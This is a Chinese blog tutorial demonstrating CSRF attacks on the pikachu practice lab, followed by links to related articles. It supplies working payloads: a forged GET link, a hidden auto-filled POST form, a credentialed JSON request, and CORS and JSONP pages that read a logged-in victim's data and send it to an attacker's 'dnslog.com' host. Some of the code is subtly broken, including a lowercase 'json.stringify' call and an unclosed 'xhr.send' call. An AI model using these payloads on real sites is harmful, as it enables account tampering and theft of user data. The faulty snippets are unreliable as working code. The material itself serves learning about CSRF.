跨站请求伪造(CSRF)漏洞

已于 2023-06-02 10:16:42 修改
阅读量336 收藏 1
点赞数
文章标签: csrf 网络安全
于 2023-05-31 17:16:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47848569/article/details/130498971
版权

跨站请求伪造 CSRF漏洞

前言

CSRF的本质就是在不知情的情况下执行请求
CSRF的原理: 利用cookie在浏览器不过期的操作,使攻击者构造恶意的payload来修改用户的信息等
CSRF发生条件当用户在安全网站A登录后保持登录的状态,并同时浏览了保存有恶意代码的另一个网站B,此时B网站劫持用户的浏览器并以用户登录的状态对A网站发送非用户本人操作的请求。
环境:pikachu靶场

CSRF漏洞挖掘的技巧

一般检查请求包中请求头referer | token | auth是否生效 如果都不生效就很有可能存在csrf漏洞

操作型CSRF

GET

通过修改超链接中的参数来修改个人信息
在这里插入图片描述
通过上图我们看见成功修改了个人信息中的数据

接下来我们直接构造一个恶意的URL 结合社会工程学让别人点击这个链接就可以修改受害者的信息了

http://192.168.101.190/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=1&submit=submit

POST

常规POST包

在这里插入图片描述

从上图中请求方法是POST 然后请求体是准备要修改的数据并且请求行里面没有referer token等字段 所以我们构造的HTML如下:

<html>
  <body>
  <h1>CSRF-POST伪造包</h1>
  <!-- <script>history.pushState('', '', '/')</script> -->
    <form action="http://192.168.101.190/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="3" />
      <input type="hidden" name="phonenum" value="2" />
      <input type="hidden" name="add" value="2" />
      <input type="hidden" name="email" value="2" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

在这里插入图片描述
最后修改成功

POST_JSON的包

POST /webnet/edit HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Content-Length: 85
Cookie: testcookie=yes; ASP.NET_SessionId=5udmqb45qoypdc55mfp1w4vy
 
{"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"}

如上所示请求体是json数据结构 我们构造的html如下所示:

<html>
    <body>
        <script>
            function submitRequest() {
                var xhr = new XMLHttpRequest();
                xhr.open("POST", "http://www.xxx.com/webnet/edit", true);
                xhr.setRequestHeader("Accept", "*/*");
                xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
                xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
                xhr.withCredentials = true;
                xhr.send(JSON.stringify({"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"});
                
        }
        </script>
        <form action="#">
            <input type="button" value="Submit request" onclick="submitRequest();"/>
        </form>
    </body>
</html>

读取型CSRF

CORF(跨源资源共享)

防御:
验证 HTTP Referer 字段
在 HTTP 头中自定义属性并验证

当浏览器发现某个请求不符合同源策略就会给该请求加一个请求头:Origin 后台进行处理,如果确认接受请求则在返回结果中加入一个响应头:Access-Control-Allow-Origin 浏览器会判断该响应头中是否包含Origin的值,如果不包含浏览器直接驳回,这时我们无法拿到响应数据

在配置了cors的前提下,当你登录网站a.com,并跨域访问网站b.com的时候,浏览器判断你的操作时跨域,这时会在请求包里面加一个origin字段,内容为:Origin:b.com 这样你就能跨域了,当cors的配置错误时就会产生cors漏洞 【我给你发一个html,我就可以获取你当前页面的数据】

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF-CORS</title>
</head>
<body>
    <div id="output"></div>
    <script src="http://www.w3school.com.cn/jquery-1.11.1.min.js"></script>
    <script type="text/javascript">
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('get','http://127.0.0.1/pichachu',true)//攻击网站的url
        req.withCredentials = true;
        req.send();
        function reqListener(){
            $.ajax({
                type:'get',
                url:'http://dnslog.com',//自己的dnslog
                data:json.stringify(req.responseText)
            });
        };
    </script>
</body>
</html>

JSONP

只支持get请求方式

script标签可以加载其它域下的js,我们可以利用这个特性实现从其他域下获取数据.通过
<script src="http://127.0.0.1:8080/name"></script>这时会向接口发送获取数据,获取数据后作为js来执行.但是这个数据时json格式的,直接作为js运行的话会报错,这时候我们就可以在src后面加上一个回调函数showData
<script src="http://127.0.0.1:8080/name ? callback=showData"></script>
在链接里面修改callback的值会发生变化说明就有jsonp漏洞http://127.0.0.1:8080/name ? callback=123.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF-JSONP</title>
</head>
<body onload="load()">
    <script src="http://www.w3school.com.cn/jquery-1.11.1.min.js"></script>
    <script>
        function load(){
            $.ajax({
                url:"http://127.0.0.1/pikachu",
                type:"GET",//指定请求方法
                dataType:"jsonp",//指定服务器返回的数据类型
                jsonp:"callback",//指定参数名称
                jsonpCallback:"abc123",
                success: function(data){
                    $.ajax({
                        type:'get',
                        url:'http://dnslog.com',
                        data:JSON.stringify(data)
                    });
                }
            });
        }
    </script>
</body>
</html>
川邮之光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【渗透测试笔记】八、CSRF跨站请求伪造漏洞
【User Not Found】的博客
04-26 696
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境关于漏洞漏洞挖掘漏洞预防下一篇:Brute force Attacks(暴力破解) 实验环境 本实验基于以下环境: 【渗透测试笔记】一、环境搭建(Vi...
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
跨站请求伪造CSRF
浪漫鼠
05-27 3083
以下转自:http://www.cnblogs.com/dolphinX/p/3403520.html CSRF是Cross Site Request Forgery的缩写,乍一看和XSS差不多的样子,但是其原理正好相反,XSS是利用合法用户获取其信息,而CSRF伪造成合法用户发起请求。 在XSS危害——session 劫持中我们提到了session原理,用户登录后会把登录信息存放在
CSRF(跨站请求伪造)漏洞 (带靶场演示+漏洞挖掘)
最新发布
wudideaqing的博客
06-14 2544
链接点击。
web基础漏洞CSRF跨站请求伪造漏洞)
m0_62274649的博客
10-04 1284
一些自己的小总结,有待完善
跨站请求伪造漏洞CSRF
qq_44484541的博客
04-05 1288
CSRF(Cross-Site Request Forgery),也被称为 one-click attack 或者 session riding,即跨站请求伪造攻击。
Web安全——CSRF跨站请求伪造漏洞
2402_83242246的博客
04-29 780
CSRF,全称Cross-site request forgery,即跨站请求伪造,也被称为one-click attack或者XSRF,是一种攻击者利用受害者尚未失效的身份认证信息(如cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作(如转账、改密等)的攻击方法。
CSRF跨站请求伪造)详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
php漏洞之跨网站请求伪造与防止伪造方法
10-26
跨站请求伪造(Cross-Site Request Forgery,简称CSRF)是一种网络安全漏洞,攻击者通过诱导用户在未经许可的情况下执行非预期的操作,从而达到恶意目的。在PHP开发中,了解并防止这种攻击至关重要。 首先,我们...
论文研究-跨站请求伪造CSRF)攻击与防范技术研究 .pdf
08-23
跨站请求伪造CSRF)攻击与防范技术研究,刘雅楠,马兆丰,跨站请求伪造CSRF)攻击作为最严重的web漏洞威胁之一被列入了开放Web应用安全项目(OWASP)十大漏洞列表。该攻击具有很大隐蔽性和危
CSRF(跨站请求伪造)漏洞
weixin_45605374的博客
10-29 412
概述 CSRF(Cross-site request forgery)跨站请求伪造,也被称成为“one click attack”,通常缩写为CSRF,是一种对网站的恶意利用。 攻击者盗用了你的cookie凭证 ,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,让你亲自完成攻击者布置的操作,并且你并不知道这个过程。 通常对系统的添加、修改、删除操作危害极大。 重点 1、被攻击者已经登录网站,可以进行业务操作 2、被攻击者访问了攻击者构造的URL 原理 csrf漏洞的成因就是网站的cookie在浏
CSRF跨站请求伪造漏洞
heroking
10-22 1262
1 漏洞简介 跨站请求伪造(Cross-site request forgery,简称CSRF),攻击者利用受害者身份发起了HTTP请求,导致受害者在不知情的情况下进行了业务操作,如修改资料、提交订单、发布留言或评论等。 CSRF攻击攻击原理及过程如下: 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并...
跨站请求伪造CSRF漏洞
s40d1's Blog
07-08 667
0x00 CSRF原理概要 1. 概念 CSRF(Cross-Site Request Forgery)是指跨站请求伪造,通常缩写为CSRF或者是XSRF。 也可以这么理解CSRF攻击:攻击者盗用了你的身份(即用了你的COOKIE),以你的名义进行某些非法操作。CSRF能够修改你的密码,使用你的账户发送邮件,获取你的敏感信息,甚至盗走你的财产等。 2. 必要条件 要完成一次CSRF攻击,受害者必须依次完成两个步骤: 登录受信任网站A,并在本地生成Cookie 在不登出A的情况下,访问恶意网站B 必须是
渗透之路基础 -- 跨站伪造请求CSRF
09-17 150
漏洞产生原因及原理 跨站请求伪造是指攻击者可以在第三方站点制造HTTP请求并以用户在目标站点的登录态发送到目标站点,而目标站点未校验请求来源使第三方成功伪造请求。 XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。 与XSS区别 ​ XSS是可以获取到用户的cookie,不需要伪造,是用户直接触发,它可以完成网站上脚本的任意功能 ​ CSRF不知道co...
web漏洞-CSRF跨站请求伪造
rumil的博客
05-13 274
CSRF全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One Click Attack” 或 “Session Riding”,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。CSRF一句话概括:攻击者盗用(伪造)受害者的身份,以受害者的名义向服务器发送恶意请求,而这种恶意请求在服务端看起来是正常请求
漏洞篇(CSRF跨站请求伪造
m0_58001548的博客
04-17 1632
CSRF(Cross-site request forgery,跨站请求伪造)也被称为 One Click Attack(单键攻击)或者 Session Riding,通常缩写为 CSRF 或者 XSRF。forgery [ˈfɔːdʒəri] 伪造;Riding [ˈraɪdɪŋ] 驾驭马匹;骑马。
CSRF漏洞详解(跨站请求伪造
m0_52293697的博客
11-21 604
CSRF漏洞原理 跨站请求伪造 DVWA靶场 挖洞思路
第二轮学习笔记:CSRF跨站请求伪造漏洞
weixin_41489908的博客
04-26 262
早上开心的事就是,睡醒的时候,看到你昨天晚上回我的,我来不及看到的内容。。。。 ---- 网易云热评 xss直接盗取了用户的权限,利用获取的cookie登录后台,在进行进一步操作。 csrf是借助用户的权限完成攻击,伪造一个攻击的链接,让用户在登录状态下点击此链接,从而达到攻击的目的。 一、漏洞可能存在的地方 1、站点的增删改查处; 2、cookie的有效期较长的 二、漏洞利用 1、 http:...
Web漏洞CSRF(跨站请求伪造漏洞)详解
weixin_46669844的博客
02-04 2352
跨站请求伪造,冒用Cookie中的信息,发起请求攻击。CSRF(Cross-site request forgery)跨站请求伪造:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值